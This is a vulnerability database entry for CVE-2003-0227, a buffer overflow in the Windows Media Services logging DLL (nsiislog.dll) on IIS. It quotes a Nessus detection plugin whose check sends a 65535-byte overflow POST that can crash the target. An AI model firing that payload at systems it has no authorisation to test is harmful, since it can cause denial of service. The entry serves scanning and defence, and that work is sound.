Vulnerabilities > CVE-2003-0227 - Improper Restriction of Operations Within the Bounds of A Memory Buffer vulnerability in Microsoft Windows 2000 and Windows NT

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
microsoft
CWE-119
nessus
exploit available

Summary

The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request.

Vulnerable Configurations

Part Description Count
OS
Microsoft
2

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Overflow Buffers
    Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
  • Client-side Injection-induced Buffer Overflow
    This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
  • Filter Failure through Buffer Overflow
    In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
  • MIME Conversion
    An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.

Exploit-Db

descriptionMS Windows Media Services (nsiislog.dll) Remote Exploit. CVE-2003-0227. Remote exploit for windows platform
idEDB-ID:56
last seen2016-01-31
modified2003-07-14
published2003-07-14
reporterN/A
sourcehttps://www.exploit-db.com/download/56/
titleMicrosoft Windows Media Services - nsiislog.dll Remote Exploit

Nessus

NASL familyWeb Servers
NASL idNSIISLOG_DLL.NASL
descriptionSome versions of IIS shipped with a default file, nsiislog.dll, within the /scripts directory. Nessus has determined that the remote host has the file installed. The NSIISLOG.dll CGI may allow an attacker to execute arbitrary commands on this host, through a buffer overflow.
last seen2020-06-01
modified2020-06-02
plugin id11664
published2003-05-28
reporterThis script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11664
titleMicrosoft Media Services ISAPI nsiislog.dll Multiple Overflows
code
#
# (C) Tenable Network Security, Inc.
#

# Supercedes MS03-019

include("compat.inc");

if (description)
{
 script_id(11664);
 script_version("1.39");
 script_cvs_date("Date: 2018/11/15 20:50:25");

 script_cve_id("CVE-2003-0227", "CVE-2003-0349");
 script_bugtraq_id(7727, 8035);
 script_xref(name:"MSFT", value:"MS03-022");
 script_xref(name:"MSKB", value:"822343");

 script_name(english:"Microsoft Media Services ISAPI nsiislog.dll Multiple Overflows");
 script_summary(english:"Determines the presence of nsiislog.dll");

 script_set_attribute(attribute:"synopsis", value:
"Arbitrary code can be executed on the remote host.");
 script_set_attribute(attribute:"description", value:
"Some versions of IIS shipped with a default file, nsiislog.dll,
within the /scripts directory.  Nessus has determined that the
remote host has the file installed.

The NSIISLOG.dll CGI may allow an attacker to execute
arbitrary commands on this host, through a buffer overflow.");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-022");
 script_set_attribute(attribute:"solution", value:"Microsoft has released a patch for Windows 2000.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');

 script_set_attribute(attribute:"vuln_publication_date", value:"2003/05/28");
 script_set_attribute(attribute:"plugin_publication_date", value:"2003/05/28");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");

 script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

b = get_http_banner(port: port, exit_on_fail: 1);
if ("IIS" >!< b ) exit(0);

w  = http_send_recv3(method:"GET", item:"/scripts/nsiislog.dll", port:port, exit_on_fail: 1);
res = strcat(w[0], w[1], '\r\n', w[2]);
if("NetShow ISAPI Log Dll" >< res)
{
  all = make_list("date", "time", "c-dns", "cs-uri-stem", "c-starttime",
  		  "x-duration", "c-rate", "c-status", "c-playerid",
		  "c-playerversion", "c-player-language", "cs(User-Agent)",
		  "cs(Referer)", "c-hostexe");

  poison = NULL;

  foreach litem (all)
  {
   poison += litem + "=Nessus&";
  }

  poison += "c-ip=" + crap(65535);

  w = http_send_recv3(method:"POST", port: port,
    item: "/scripts/nsiislog.dll",
    content_type: "application/x-www-form-urlencoded",
    add_headers: make_array("User-Agent", "NSPlayer/2.0"),
    exit_on_fail: 1, data: poison);
  r = strcat(w[0], w[1], '\r\n', w[2]);

 # 2nd match fails on localized Windows
 if("HTTP/1.1 500 Server Error" >< r && "The remote procedure call failed. " >< r ) security_hole(port);
}

Oval

  • accepted2004-06-30T12:00:00.000-04:00
    classvulnerability
    contributors
    nameChristine Walzer
    organizationThe MITRE Corporation
    descriptionThe logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request.
    familywindows
    idoval:org.mitre.oval:def:936
    statusaccepted
    submitted2004-05-18T12:00:00.000-04:00
    titleWindows 2000 Media Services ISAPI Logging Vulnerability
    version64
  • accepted2004-06-30T12:00:00.000-04:00
    classvulnerability
    contributors
    nameChristine Walzer
    organizationThe MITRE Corporation
    descriptionThe logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request.
    familywindows
    idoval:org.mitre.oval:def:966
    statusaccepted
    submitted2004-05-18T12:00:00.000-04:00
    titleWindows NT Media Services ISAPI Logging Vulnerability
    version64